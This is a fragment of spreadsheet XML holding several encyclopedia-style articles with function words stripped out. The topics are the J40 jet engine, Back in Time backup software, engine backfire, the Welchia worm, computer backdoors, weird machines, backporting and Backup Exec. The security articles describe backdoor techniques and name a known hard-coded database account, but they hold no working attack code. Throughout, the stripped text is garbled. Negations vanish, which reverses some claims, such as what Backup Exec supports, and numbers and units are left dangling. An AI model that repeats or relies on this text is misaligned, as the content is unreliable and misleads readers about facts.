million. high point 1955 setting unofficial time-to-climb record, demon, 10,000 feet (3,000 seconds.a replacement engine could easily fitted grounded demons, fuselage redesigned enlarged. when redesign done accommodate j71, wing area also enlarged counter increased weight all-weather aircraft. skyray designed easily accept different engines emerged production powered pratt whitney j57. emerged non-afterburning engines well. f10f-1 program cancelled primarily unsolvable aerodynamic issues variable-sweep wing control systems. engine issues secondary importance prototype flight trials. variants xj40-we-2, xj40-we-4 in-house development engines. j40-we-1 force version j40-we-8, powering north american x-10 uavs. (two engines extant x-10 exhibit airframe united states force museum dayton, xj40-we-3 initial force designation first proposed version xj40-we-12: xj40-we-5 force designation derated block ii/block versions xj40-we-12: 9,500–9,900 (42–44 thrust j40-we-6 flight testing pre-production engines, powering douglas xa3d-1 skywarrior prototypes, douglas xf4d-1 skyray prototype, mcdonnell demon prototypes, grumman xf10f jaguar prototypes: 7,500 thrust j40-we-8 pre-production engine after-burner replaced versions skyray, demon jaguar. (one engine extant smithsonian space museum): 10,900 thrust xj40-we-10 experimental afterburning version xj40-we-12. determined, none actually constructed although iris type afterburner built: 13,700 thrust xj40-we-12 experimental higher-powered engine. four destroyed compressor failures test bed: 9,500 thrust xj40-we-14 spool design, placed contract developed: 12,000 thrust xj40-we-16 afterburning version j40-we-14, placed contract developed: 17,400 thrust xj40-we-18 modified afterburning version j40-we-10 convair skate program, proposed accepted. proposal later modified martin minelayer aircraft accepted either: 11,400 thrust altitude capabilities removed. xj40-we-20 modified j40-we-10 afterburner operate 50,000 feet, none built. j40-we-22/-22a production version j40-we-8, models using different control systems. (one -22a extant cutaway exhibit national naval aviation museum): 10,900 thrust xj40-we-24 proposed derated early production j40-we-10 engine: 12,050–13,100 (53.6–58.3 thrust xj40-we-26 proposed derated early production j40-we-12 engine: 9,500–9,900 (42–44 thrust applications douglas xa3d-1 skywarrior douglas xf4d-1 skyray grumman xf10f-1 jaguar mcdonnell demon north american x-10 specifications (j40-we-8) data flight. general characteristics type: afterburning turbojet length: (7.6 diameter: weight: 3,500 (1,600 components compressor: single-spool, stage axial (most sources state error engine compressor stages), 50/50 action/reaction combustors: annular turbine: stage fuel type: jp-3, jp-4 100/130 avgas system: sump, gallons gal), oil/fuel heat exchanger, second inverted flight limit performance maximum thrust: 7,300 dry, 10,900 (afterburning) overall pressure ratio: 5.2:1 specific fuel consumption: 0.94 lb/(lbf⋅h) g/(kn⋅s)) dry, lb/(lbf⋅h) g/(kn⋅s)) (afterburning) thrust-to-weight ratio: 2.14 dry, (afterburning) also related lists list aircraft engines references dorr, robert (2006-01-23). "engine faults 'dashed' demon's navy career". army times. retrieved 2008-05-29. green, william (1967). world guide combat planes. doubleday. kay, anthony (2007). turbojet history development 1930-1960 volume 2:ussr, usa, japan, france, canada, sweden, switzerland, italy hungary (1st ed.). ramsbury: crowood press. isbn 978-1861269393. "b-66 destroyer skywarrior". retrieved 2006-10-12. christiansen, paul (2015). westinghouse axial turbojet family, development history technical profiles (1st ed.). olney, bleeg press llc. isbn 978-0692358528.</t>
  </si>
  <si>
    <t>Back in Time (Linux software)</t>
  </si>
  <si>
    <t>back time backup application linux. versions integrate favorably gnome available directly repositories many linux distributions. released terms general public license (gpl), free software. back time uses rsync backend characteristic feature using hard links files identical snapshots different times, thus using disk space files remained unchanged. possible several backup profiles, e.g. backups different hard disks also create schedules. symbolic links backed absolute relative ones, hard links cannot treated used backup method. back time also supports encryption backups backup ssh. advantages hard link method easy look snapshots system different times also easy remove snapshots compared incremental backup methods save difference information consecutive backup times. however, drawback back time allow compression, requires file systems support hard links backup location. user interface there graphical interface written also standard backup tool time machine, works principles. references back time simple backup tool ubuntu external links back time code hosting</t>
  </si>
  <si>
    <t>Back-fire</t>
  </si>
  <si>
    <t>backfire afterburn combustion explosion produced running internal combustion engine occurs exhaust system, rather inside combustion chamber. also sometimes referred afterfire, especially cases word backfire used mean fuel burn occurs intake valve open, causing fire move backward system intake instead exhaust. when flame moves backward also called "pop-back." backfire caused either ignition happens exhaust valve open unburnt fuel making exhaust system. visible flame momentarily shoot exhaust pipe. backfire often sign engine improperly-tuned. term derives parallel experiences early unreliable firearms ammunition explosive force directed breech instead muzzle. that origin "backfire" indicate producing unintended, unexpected, undesired result. explanation common causes backfire running rich (too much fuel going cylinders) faulty ignition, possibly fouled (dirty) spark plug, coil, plug wire. pop-backs usually caused problems timing. timing early, spark plug fires intake valves close, causing combustion propagate intake manifold, igniting air-fuel mixture there; resulting explosion travels carburetor filter. many small marine engines, screen placed intake carburetor flame arrestor, prevent flames escaping intake potentially igniting fuel fuel vapors enclosed sump bilge boat, causing fire explosion. alternatively, ignition timing late, case combustion completed time exhaust valves open, allowing combustion propagate exhaust system. additionally, improperly adjusted carburetors create lean condition acceleration cause air–fuel mixture burn slowly combustion still taking place exhaust stroke, even intake valve opens. flame front travel intake cause popback. situation conceivable popback occurring intake manifold exhaust manifold simultaneously. cases (combustion occurring combustion chamber), result sharp pop, colloquially referred "backfire". however, troubleshooting, engine mechanics strictly define ignition fuel within engine exhaust system "backfire", "popback" process taking place induction system. causes exhaust system backfires occur engines emission system malfunction, like injection system diverter valve problem, exhaust leak, catalytic converter removed. high-performance vehicles, driver shifts lets accelerator, engine moment running rich. this causes incomplete burn causes fumes explode exhaust system along audible bang sound. this result working equipment, unlikely cause damage. fuel-injected engine backfire intake leak present (causing engine lean), fuel injection component air-flow sensor defective. common causes backfires are: wankel rotary engines known leaking exhaust system causes backfire. poor unregulated engine timing often cause intake backfires, also responsible exhaust backfires. backfires loud explosion-like sounds common antilag system present active. improper wiring ignition also lead timing issues backfires. fuel pressure, clogged fuel filters, weak fuel pumps could cause severely lean air-to-fuel ratio fuel injection process. missing damaged catalytic converter result backfires tailpipe. broken exhaust-system piping, especially located immediately downstream exhaust manifold, result backfiring underneath vehicle. applications with older engine designs, backfiring common unavoidable. backfire rare modern vehicles fuel-injection computer-controlled fuel mixtures. cars sports exhausts (both factory-fitted aftermarket) much likely backfire. circumstances backfire seen additional perk car. cerbera example factory-fitted sports exhausts produce frequent backfires engine braking. high-powered supercharged aircraft piston engines rolls-royce merlin griffon, backfiring inlet manifold prevented flame traps inside manifold, traps preventing flame propagating compressed air/fuel mixture within manifold. also dieseling, after-run condition engine continues without spark plugs firing references william toboldt (author), larry johnson (author), scott gauthier (author) (2006). automotive encyclopedia (goodheart-willcox automotive encyclopedia) (18th ed.). isbn 1590704223. {{cite book}}: |author= generic name (help)cs1 maint: multiple names: authors list (link)</t>
  </si>
  <si>
    <t>Welchia</t>
  </si>
  <si>
    <t>welchia, also known "nachi worm", computer worm exploits vulnerability microsoft remote procedure call (rpc) service similar blaster worm. however, unlike blaster, first searches deletes blaster exists, tries download install security patches microsoft would prevent infection blaster, classified helpful worm. welchia successful deleting blaster, microsoft claimed always successful applying security patch.this worm infected systems exploiting vulnerabilities microsoft windows system code (tftpd.exe ports 666–765, buffer overflow port 135). method infection create remote shell instruct system download worm using tftp.exe. specifically, welchia worm targeted machines running windows worm used icmp, instances flooded networks enough icmp traffic cause problems.once system, worm patches vulnerability used gain access (thereby actually securing system attempts exploit method intrusion) payload, series microsoft patches. attempts remove blaster worm deleting msblast.exe. still system, worm programmed self-remove january 2004, days processing, whichever comes first. september 2003, worm discovered state department's computer network, causing shut network hours remediation. also helpful worm blaster (computer worm) sasser (computer worm) timeline notable computer viruses worms references external links symantec information welchia nachi</t>
  </si>
  <si>
    <t>Backdoor (computing)</t>
  </si>
  <si>
    <t>backdoor typically covert method bypassing normal authentication encryption computer, product, embedded device (e.g. home router), embodiment (e.g. part cryptosystem, algorithm, chipset, even "homunculus computer" tiny computer-within-a-computer found intel's technology). backdoors often used securing remote access computer, obtaining access plaintext cryptographic systems. from used gain access privileged information like passwords, corrupt delete data hard drives, transfer information within autoschediastic networks. backdoor take form hidden part program, separate program (e.g. back orifice subvert system rootkit), code firmware hardware, parts operating system windows. trojan horses used create vulnerabilities device. trojan horse appear entirely legitimate program, executed, triggers activity install backdoor. although secretly installed, backdoors deliberate widely known. these kinds backdoors "legitimate" uses providing manufacturer restore user passwords. many systems store information within cloud fail create accurate security measures. many systems connected within cloud, hackers gain access platforms vulnerable system.default passwords default credentials) function backdoors changed user. some debugging features also backdoors removed release version.in 1993, united states government attempted deploy encryption system, clipper chip, explicit backdoor enforcement national security access. chip unsuccessful. overview threat backdoors surfaced multiuser networked operating systems became widely adopted. petersen turn discussed computer subversion paper published proceedings 1967 afips conference. they noted class active infiltration attacks "trapdoor" entry points system bypass security facilities permit direct access data. word trapdoor clearly coincides recent definitions backdoor. however, since advent public cryptography term trapdoor acquired different meaning (see trapdoor function), thus term "backdoor" preferred, term trapdoor went use. more generally, security breaches discussed length rand corporation task force report published arpa sponsorship j.p. anderson d.j. edwards 1970.a backdoor login system might take form hard coded user password combination gives access system. example sort backdoor used plot device 1983 film wargames, architect "wopr" computer system inserted hardcoded password gave user access system, undocumented parts system particular, video game-like simulation mode direct interaction artificial intelligence). although number backdoors systems using proprietary software (software whose source code publicly available) widely credited, nevertheless frequently exposed. programmers even succeeded secretly installing large amounts benign code easter eggs programs, although cases involve official forbearance, actual permission. politics attribution there number cloak dagger considerations come play apportioning responsibility. covert backdoors sometimes masquerade inadvertent defects (bugs) reasons plausible deniability. cases, might begin life actual (inadvertent error), which, discovered deliberately left unfixed undisclosed, whether rogue employee personal advantage, c-level executive awareness oversight. also possible entirely above-board corporation's technology base covertly untraceably tainted external agents (hackers), though level sophistication thought exist mainly level nation state actors. example, photomask obtained photomask supplier differs gates photomask specification, chip manufacturer would hard-pressed detect otherwise functionally silent; covert rootkit running photomask etching equipment could enact discrepancy unbeknown photomask manufacturer, either, means, backdoor potentially leads another. (this hypothetical scenario essentially silicon version undetectable compiler backdoor, discussed below.) general terms, long dependency-chains modern, highly specialized technological economy innumerable human-elements process control-points make difficult conclusively pinpoint responsibility time covert backdoor becomes unveiled. even direct admissions responsibility must scrutinized carefully confessing party beholden powerful interests. examples worms many computer worms, sobig mydoom, install backdoor affected computer (generally broadband running microsoft windows microsoft outlook). such backdoors appear installed spammers send junk e-mail infected machines. others, sony/bmg rootkit, placed secretly millions music late 2005, intended measures—and, case, data-gathering agents, since surreptitious programs installed routinely contacted central servers. sophisticated attempt plant backdoor linux kernel, exposed november 2003, added small subtle code change subverting revision control system. case, two-line change appeared check root access permissions caller sys_wait4 function, used assignment instead equality checking actually granted permissions system. this difference easily overlooked, could even interpreted accidental typographical error, rather intentional attack. january 2014, backdoor discovered certain samsung android products, like galaxy devices. samsung proprietary android versions fitted backdoor provides remote access data stored device. particular, samsung android software charge handling communications modem, using samsung protocol, implements class requests known remote file server (rfs) commands, allows backdoor operator perform modem remote operations device hard disk storage. modem running samsung proprietary android software, likely offers over-the-air remote control could used issue commands thus access file system device. object code backdoors harder detect backdoors involve modifying object code, rather source code object code much harder inspect, designed machine-readable, human-readable. these backdoors inserted either directly on-disk object code, inserted point compilation, assembly linking, loading latter case backdoor never appears disk, memory. object code backdoors difficult detect inspection object code, easily detected simply checking changes (differences), notably length checksum, cases detected analyzed disassembling object code. further, object code backdoors removed (assuming source code available) simply recompiling source trusted system. thus backdoors avoid detection, extant copies binary must subverted, validation checksums must also compromised, source must unavailable, prevent recompilation. alternatively, tools (length checks, diff, checksumming, disassemblers) compromised conceal backdoor, example detecting subverted binary checksummed returning expected value, actual value. conceal subversions, tools must also conceal changes example, subverted checksummer must also detect checksumming subverted tools) return false values. this leads extensive changes system tools needed conceal single change. because object code regenerated recompiling (reassembling, relinking) original source code, making persistent object code backdoor (without modifying source code) requires subverting compiler detects compiling program attack inserts backdoor alternatively assembler, linker, loader. requires subverting compiler, turn fixed recompiling compiler, removing backdoor insertion code. this defense turn subverted putting source meta-backdoor compiler, detects compiling inserts meta-backdoor generator, together original backdoor generator original program attack. after done, source meta-backdoor removed, compiler recompiled original source compromised compiler executable: backdoor bootstrapped. this attack dates karger schell (1974), popularized thompson's 1984 article, entitled "reflections trusting trust"; hence colloquially known "trusting trust" attack. compiler backdoors, below, details. analogous attacks target lower levels system, operating system, inserted system booting process; also mentioned karger schell (1974), exist form boot sector viruses. asymmetric backdoors traditional backdoor symmetric backdoor: anyone finds backdoor turn notion asymmetric backdoor introduced adam young moti yung proceedings advances cryptology: crypto '96. asymmetric backdoor used attacker plants even full implementation backdoor becomes public (e.g., publishing, discovered disclosed reverse engineering, etc.). also, computationally intractable detect presence asymmetric backdoor black-box queries. this class attacks termed kleptography; carried software, hardware (for example, smartcards), combination two. theory asymmetric backdoors part larger field called cryptovirology. notably, inserted kleptographic backdoor dual drbg standard.there exists experimental asymmetric backdoor generation. this openssl backdoor, designed young yung, utilizes twisted pair elliptic curves, made available. compiler backdoors sophisticated form black backdoor compiler backdoor, compiler subverted insert backdoor program, login program), modified detect compiling inserts backdoor insertion code (targeting program) code-modifying self-compilation, like mechanism retroviruses infect host. this done modifying source code, resulting compromised compiler (object code) compile original (unmodified) source code insert itself: exploit boot-strapped. this attack originally presented karger schell (1974, section 3.4.5: "trap door insertion"), united states force security analysis multics, described attack pl/i compiler, call "compiler trap door"; also mention variant system initialization code modified insert backdoor booting, complex poorly understood, call "initialization trapdoor"; known boot sector virus.this attack actually implemented thompson, popularized turing award acceptance speech 1983 (published 1984), "reflections trusting trust", points trust relative, software truly trust code every step bootstrapping inspected. this backdoor mechanism based fact people review source (human-written) code, compiled machine code (object code). program called compiler used create second first, compiler usually trusted honest job. thompson's paper describes modified version unix compiler would invisible backdoor unix login command noticed login program compiled, would also feature undetectably future compiler versions upon compilation well. because compiler compiled program, users would extremely unlikely notice machine code instructions performed tasks. (because second task, compiler's source code would appear "clean".) what's worse, thompson's proof concept implementation, subverted compiler also subverted analysis program (the disassembler), anyone examined binaries usual would actually real code running, something else instead. updated analysis original exploit given karger schell (2002, section 3.2.4: compiler trap doors), historical overview survey literature given wheeler (2009, section background related work). occurrences thompson's version was, officially, never released wild. believed, however, version distributed least backdoor recorded. there scattered anecdotal reports backdoors subsequent years. august 2009, attack kind discovered sophos labs. w32/induc-a virus infected program compiler delphi, windows programming language. virus introduced code compilation delphi programs, allowing infect propagate many systems, without knowledge software programmer. attack propagates building trojan horse especially hard discover. believed induc-a virus propagating least year discovered. countermeasures once system compromised backdoor trojan horse, trusting trust compiler, hard "rightful" user regain control system typically rebuild clean system transfer data (but executables) over. however, several practical weaknesses trusting trust scheme suggested. example, sufficiently motivated user could painstakingly review machine code untrusted compiler using mentioned above, ways hide trojan horse, subverting disassembler; ways counter defense, too, writing disassembler scratch.a generic method counter trusting trust attacks called diverse double-compiling (ddc). method requires different compiler source code compiler-under-test. that source, compiled compilers, results different stage-1 compilers, however behavior. thus source compiled stage-1 compilers must result identical stage-2 compilers. formal proof given latter comparison guarantees purported source code executable compiler-under-test correspond, assumptions. this method applied author verify compiler suite 3.0.4) contained trojan, using 11.0) different compiler.in practice verifications done users, except extreme circumstances intrusion detection analysis, rarity sophisticated attacks, programs typically distributed binary form. removing backdoors (including compiler backdoors) typically done simply rebuilding clean system. however, sophisticated verifications interest operating system vendors, ensure distributing compromised system, high-security settings, attacks realistic concern. list known backdoors back orifice created 1998 hackers cult dead group remote administration tool. allowed windows computers remotely controlled network parodied name microsoft's backoffice. dual drbg cryptographically secure pseudorandom number generator revealed 2013 possibly kleptographic backdoor deliberately inserted nsa, also private backdoor. several backdoors unlicensed copies wordpress plug-ins discovered march 2014. they inserted obfuscated javascript code silently created, example, admin account website database. similar scheme later exposed joomla plugin. borland interbase versions hard-coded backdoor, developers. server code contains compiled-in backdoor account (username: politically, password: correct), could accessed network connection; user logging backdoor account could take full control interbase databases. backdoor detected 2001 patch released. juniper networks backdoor inserted year 2008 versions firmware screenos 6.2.0r15 6.2.0r18 6.3.0r12 6.3.0r20 gives user administrative access using special master password. several backdoors discovered c-data optical line termination (olt) devices. researchers released findings without notifying c-data believe backdoors intentionally placed vendor. also backdoor:win32.hupigon backdoor.win32.seed hardware backdoor titanium (malware) references further reading external links finding removing backdoors three archaic backdoor trojan programs that still serve great pranks backdoors removal list backdoors removal instructions. farm's backdoors faq: wiki question answer forum list backdoors removal</t>
  </si>
  <si>
    <t>Weird machine</t>
  </si>
  <si>
    <t>concept weird machine theoretical framework understand existence exploits security vulnerabilities. exploits exist empirically, studied theoretical perspective prior emergence framework weird machines. computer security, weird machine computational artifact additional code execution happen outside original specification program. closely related concept weird instructions, building blocks exploit based crafted input data. theory from theoretical perspective, emergence weird machines becomes clear considers software restrict number reachable states state transitions computer: general-purpose software, specialized simulate finite-state machine (with potentially large state space). many states could excluded, certain state transitions ruled example violate software's security requirements. when system somehow moved state "makes sense" viewed perspective intended finite-state machine (through memory corruption, hardware failure, programming mistakes), software keep transforming broken state broken states, triggered user input. computational device arises: weird machine reach different states programmer anticipated, reaction inputs. applications while expected, valid input activates normal, intended functionality computer program, input unexpected program developer activate unintended functionality. weird machine consists unintended functionality programmed selected inputs exploit. classical attack taking advantage stack buffer overflow, input given vulnerable program crafted delivered becomes executed program code. however, data areas program memory protected cannot executed directly like this, input instead take form pointers pieces existing program code become executed unexpected order generate functionality exploit. these snippets code used exploit referred gadgets context return-oriented programming. through interpretation data code, weird machine functionality definition outside original program specification reached also proof-carrying code (pcc), formally proven function certain specific way. this disparity essentially caused disconnect formal abstract modelling computer program real-world instance, influenced events captured original abstraction, memory errors power outages. weird machine behaviors observed even hardware. instance, shown computation instructions x86. mitigation central categories mitigation problems caused weird machine functionality include input validation within software protecting problems arising platform program runs, memory errors. input validation aims limit scope forms unexpected inputs e.g. whitelists allowed inputs, software program would unexpected state interpreting data internally. equally importantly, secure programming practices protecting buffer overflows make less likely input data becomes interpreted unintended ways lower layers, hardware program executed. also exploit (computer security) return-oriented programming speedrun stack buffer overflow references</t>
  </si>
  <si>
    <t>Backporting</t>
  </si>
  <si>
    <t>backporting action taking parts newer version software system software component porting older version software. forms part maintenance step software development process, commonly used fixing security issues older versions software also providing features older versions. overview simplest probably common situation backporting fixed security hole newer version piece software. consider simplified example: software v2.0 security vulnerability fixed changing text 'is_unsecured' 'is_secured'. security hole exists software v1.0, codebase newer version derived, text read 'is_notsecure'.by taking modification fixes software v2.0 changing applies software v1.0, effectively backported fix.in real-life situations, modifications single aspect software undergone simple (only lines code changed) heavy massive (many modifications spread across multiple files code). latter case, backporting become tedious inefficient undergone older version software really needed favour newer (if, example, newer version still suffers stability problems prevent mission-critical situations). procedures process backporting roughly divided steps: identification problem older version software needs fixed backport finding (usually recent) modification code fixed problem adapting modification code situation (the proper backporting) several levels quality control testing whether backported version maintains previous functionality well properly implements functionality.usually, multiple modifications bundled patch set. backports provided core developer group software. since backporting needs access source code piece software, backporting done closed source software backports usually incorporated binary upgrades along version line software. with open-source software, backports sometimes created software distributors later sent upstream (that submitted core developers afflicted software). examples many features windows vista backported windows service pack released windows thereby facilitating compatibility applications (mostly games) originally vista minimum requirement minimum requirement instead.debian project since september 2010 provides official backporting service debian linux software packages, ubuntu linux also supports backports, however ubuntu backports receives support canonical, entirely community-maintained. also backward compatibility retrofitting java backporting tools references</t>
  </si>
  <si>
    <t>Backup Exec</t>
  </si>
  <si>
    <t>veritas backup exec data protection software product designed customers mixed physical virtual environments, moving public cloud services. supported platforms include vmware hyper-v virtualization, windows linux operating systems, amazon microsoft azure google cloud storage, among others. management configuration operations performed single user interface. backup exec also provides integrated deduplication, replication, disaster recovery capabilities helps manage multiple backup servers multi-drive tape loaders. backup exec employs automated installation process. installing backup exec windows server 2012 system takes around minutes, according reviews. installation wizard started backup exec installation media management console push agents physical servers, hyper-v/vmware virtual machines, application/database systems hosting active directory, exchange, oracle database, sql, supported platforms. with client/server design, backup exec provides backup restore capabilities servers, applications workstations across network. backup exec recovers data, applications, databases, systems individual file, mailbox item, table object, entire server. current versions software support microsoft, vmware, linux, among others.when used tape drives, backup exec uses microsoft tape format (mtf), also used windows ntbackup, backup utilities included microsoft server, many backup vendors compatible bkf. microsoft tape format (mtf) originally maynard's (backup exec's first authors) proprietary backup tape format (mtf) later licensed microsoft windows standard tape format. addition, microsoft also licensed incorporated backup exec's backup engine windows server version windows.in addition, backup exec's family agents options offer features scaling backup exec environment extending platform feature support. backup exec 21.3 latest version veritas’ backup recovery software, released september 2021. history within “backup” portion data protection spectrum, veritas product, backup exec, market decades. since early days microsoft’s journey turn windows server world’s dominant client-server operating system, backup exec handful technologies protect winsvr grew become platform choice application enablement user productivity, backup exec’s media/platform support, application support, internal operation evolved similar pace.backup exec long history successive owner-companies. earliest roots stretch back early 1980s maynard electronics wrote bundle software drivers help sell tape-drive products. 1982 maynard electronics started. maynard's software known "maynstream." 1989 maynard acquired archive corp. maynstream available dos, windows, macintosh, os/2, netware. 1991 quest development corporation independently formed develop backup software contract symantec. 1993 conner peripherals acquires archive corp. renames software "backup exec". 1993 quest acquired rights fastback macintosh, hired principal author, chappell, fifth generation systems. 1994 conner creates subsidiary, arcada software, acquiring quest merging existing software division. 1995 arcada acquires sytron division rexon, including os/2 backup software. 1996 conner acquired seagate technology arcada merged subsidiary seagate software. 1999 veritas software acquires seagate software's network storage management group, included backup exec. 2005 symantec acquires veritas, including backup exec. 2015 symantec announced would splitting information management business contains backup exec, company named veritas technologies corporation acquired carlyle group. 2016 veritas technologies re-launches newly independent company contains backup exec. architecture core components core components contained basic backup exec architecture include following: backup exec server heart backup exec installation. backup exec server windows server that: runs backup exec software services control backup restore operations attached controls storage hardware maintains backup exec database, media catalogs, device catalogs backup exec administration console interface control backup exec server. administration console directly backup exec server remote system (using backup exec remote administration console). storage devices attached backup exec server contain media backup data written. backup exec supports many different types devices media, including cloud, disk-based tape-based. backup exec supports unlimited number clients, ndmp-nas systems, tape drives, tape libraries. clients systems contain data backup exec server backs clients include database servers, application servers, file servers, individual workstations. add-on components backup exec agents options expand features functionality core backup exec server support common server applications, including microsoft exchange, sharepoint server, oracle, windows linux clients, server oss, hyper-v vmware hypervisors. agents agents traditional sense. example, agent vmware hyper-v carrying backup process. agent simply collecting meta data (takes seconds) backup exec perform granular recoveries directly storage point future mounting required. here list backup exec agents options: installation backup exec options installed local computer, remote computer, within virtual environment, public cloud "infrastructure service (iaas)" virtualization platform. today backup exec supports backup exec server installation 64-bit operating systems only. however, agent windows installed 32-bit operating systems. several methods available installing backup exec. environment check runs automatically installation make sure installation process complete. backup exec finds configuration issues fixed installation, prevent installation, warnings appear.backup exec installed using following: installation wizard backup exec installation media, guides installation process. push-install backup exec remote computers terminal services installation media shared drive (network share). command line, called silent mode installation. silent mode installation uses setup.exe program backup exec installation media.additionally, backup exec installation media also remote administrator feature installed remote computer workstation administer backup exec server remotely. backup exec install additional products: microsoft report viewer 2010 microsoft.net framework microsoft visual 2008 servicepack redistributable package mfcsecurity update microsoft visual 2010 servicepack redistributable package security update microsoft visual 2012 redistributable package microsoft visual 2015 redistributable package microsoft server 2014 express configuration backup exec installations backup exec servers, responsible moving data locations storage medium, including cloud, disk, tape, device. data local system remote system. there primary backup exec architectures: standalone backup exec configuration (two-tier) single backup exec server assigned standalone backup exec server role. each server runs backup exec software services control backup restore operations multiple clients. each backup exec server maintains backup exec database, media catalogs, device catalogs. central admin server option (caso) configuration (three-tier) large environments contain multiple backup exec servers responsible backing many different client systems. backup exec servers large environments independently server managed separately. separate server management issue three backup exec servers, become unwieldy environment grows. backup exec centralize management multiple backup exec servers using add-on option called backup exec central admin server option (caso). caso ensures everything throughout network protected single system managed console also balances workload across backup exec servers environment. caso environment, backup exec server configured central admin server (cas), backup execs become managed backup exec servers (mbess) managed cas. caso configuration simplifies management monitoring enterprise-level environments. features capabilities backup exec includes following features capabilities: backup options: image-based backups vmware hyper-v full backup method differential backup method incremental backup method synthetic backups advanced open file option (aofo) backup disk, tape, cloud regardless location. recovery options: catalog-assisted granular recovery objects, files, folders, applications, (including exchange, sharepoint, server, active directory) directly storage, mounting staging. restore different targets hardware (dissimilar hardware recovery) restore physical virtual servers simplified disaster recovery (sdr) guided search restore: built-in indexing ability restore files search. true image restore cloud supportfree cloud connector backup exec back data s3-compatible cloud storage free azure cloud connector backup exec write data microsoft azure cloud storage cloud connector deployed on-premises in-the-cloud backup exec predefined templates disk-to-disk-to-cloud direct-to-cloud backups. support for: amazon simple storage service (s3) microsoft azure storage google cloud standard amazon storage gateway-vtl (iscsi) quantum q-cloud (ost cloud storage plug-in) amazon microsoft azure netapp altavault/steelstore/whitewater appliance support backup exec within virtual environment public cloud "infrastructure service (iaas)" virtualization platform hybrid/private cloud services virtual server protection supportmulti-hypervisor support (microsoft hyper-v, vmware vsphere, citrix xenserver) supports agentless backup hyper-v vmware virtual machines supports image-level, off-host backups virtual machines support vmware changed block tracking (cbt) block optimization support: intelligent skipping unused blocks within virtual disk file integration microsoft volume shadow copy service vmware’s vstorage apis data protection (vadp) from single-pass backup virtual machine, recover:an entire virtual machine individual virtual machine disk (vmdk) virtual hard disk (vhd/x) files individual files folders entire applications (microsoft exchange server, microsoft sharepoint, microsoft active directory, microsoft server, oracle database) granular application objects microsoft exchange server, microsoft sharepoint, microsoft active directory, microsoft server fully integrated physical-to-virtual (p2v), used migrations instant recovery also supports backup virtual (b2v) point-in-time conversion (pit) integrated data deduplication:integrated block-level data deduplication client, server-side, appliance deduplication client deduplication supported windows well linux computers optimized duplication (opt dup) supports backup "replication" mms/mbe cas/ mms/mbe security data encryption: software encryption hardware encryption (t10 encryption standard) database encryption (dek) fips version: openssl fips 2.0.5 secure protocol control connection (over ndmp) backup exec server agent remote computer management reporting: centralized administration: provides single console managing entire backup exec environment, creates delegates jobs multiple backup exec servers, defines device media sets. centralized reporting: monitors activity dispatched real time, provides holistic reporting entire storage environment, centrally defines notification alert settings operational resiliency: automatically load-balances jobs across multiple backup exec servers, provides failover backup exec server another, centralizes replicates catalogs restores. management plug-in vmware vsphere management pack microsoft system center operations manager 2007 2012 (scom) management plug-in kaseya localization/language packs command line interface (bemcli) media management: automatic robotic/tape drive configuration broad tape device support heterogeneous support: broad platform support bare-metal restore, supports option. support leading networking topologies advanced support openstorage (ost) support ipv4 ipv6 support multiplexing limitation backup exec support sending data streams multiple parallel backup jobs single tape drive, veritas refers multiplexing. their netbackup product capability.multiplexing reduce backup times backing data non-solid state sources containing millions small highly fragmented files, require large amounts head-seeking using traditional mechanical hard drives, significantly slow backup process. when single running, source server constantly seeking high rate, tape drive slows stop, waiting write cache filled. these delays accessing data cause backup availability window exceeded, multiple servers slow transfer rates backed tape device. workaround install temporary disk storage backup server cache backup process. this storage split hundreds small gigabyte data blocks. backups data blocks done parallel, separate disk-based backup jobs configured duplicate append tape completed. licensing backup exec following licensing options: capacity edition deploy unlimited number backup exec servers, agents options (licensed capacity edition lite includes protection windows linux operating systems, vmware hyper-v virtual environments, microsoft applications, oracle, enterprise vault (licensed v-ray edition protects unlimited number guest machines host including applications databases (licensed occupied processor socket virtual host) traditional licensing backup exec server agents options available based need releases maynstream windows 3.0, may, 1992 conner backup exec version conner backup exec windows 3.1, may, 1993 barney, doug (june 1994). "arcada backup exec bundled chicago". infoworld. (24): arcada software backup exec windows 6.0, april, 1995 seagate software backup exec windows 7.0, august, 1997 seagate backup exec 7.2, october, 1998 veritas backup exec 7.3, march, 1999 veritas backup exec 8.0, january, 2000 veritas backup exec 8.6, november, 2001 veritas backup exec 9.0, january 2003 veritas backup exec 9.1, november 2003 veritas backup exec 10.0, january, 2005 symantec backup exec 10d, september, 2005 symantec backup exec 11d, november, 2006 symantec backup exec february, 2008 symantec backup exec 12.5, october, 2008 symantec backup exec 2010 (13.0), february, 2010 symantec backup exec 2010 sp1, august 2010 symantec backup exec 2010 august 2010 symantec backup exec 2010 symantec backup exec 2010 2011 symantec backup exec 2010 sp1, june 2012 symantec backup exec 2010 sp2, february 2012 symantec backup exec 2010 sp3, july 2013 symantec backup exec 2010 sp4, january 2014 symantec backup exec 2012 (14.0), march 2012 symantec backup exec 2012 sp1, june 2012 symantec backup exec 2012 sp2, july 2013 symantec backup exec 2012 sp3, november 2013 symantec backup exec 2012 sp4, march 2014 symantec backup exec 2014, (14.1), june 2014 symantec backup exec 2014 sp1, september 2014 symantec backup exec 2014 sp2, december 2014 symantec backup exec (14.2 1180), april 2015 symantec backup exec fp1, july 2015 symantec backup exec fp2, october 2015 symantec backup exec fp3, december 2015 veritas backup exec fp4, april 2016 veritas backup exec fp5, august 2016 veritas backup exec november 2016 veritas backup exec fp1, april 2017 veritas backup exec fp2, july 2017 veritas backup exec, november 2017 veritas backup exec (20.1), april 2018 veritas backup exec (20.2), august 2018 veritas backup exec (20.3), october 2018 veritas backup exec (20.4), 2019 veritas backup exec (20.5), 2019 veritas backup exec (20.6), 2019 veritas backup exec (21), 2020 veritas backup exec (21.1), 2020 veritas backup exec (21.2), 2021 veritas backup exec (21.3), 2021 also backup list backup software netbackup veritas software references external links backup exec product page veritas.com backup exec support page veritas.com backup exec user discussion forum veritas communities detailed history backup exec from storagenewsletter with chart</t>
  </si>
  <si>
    <t>Backup Express</t>
  </si>
  <si>
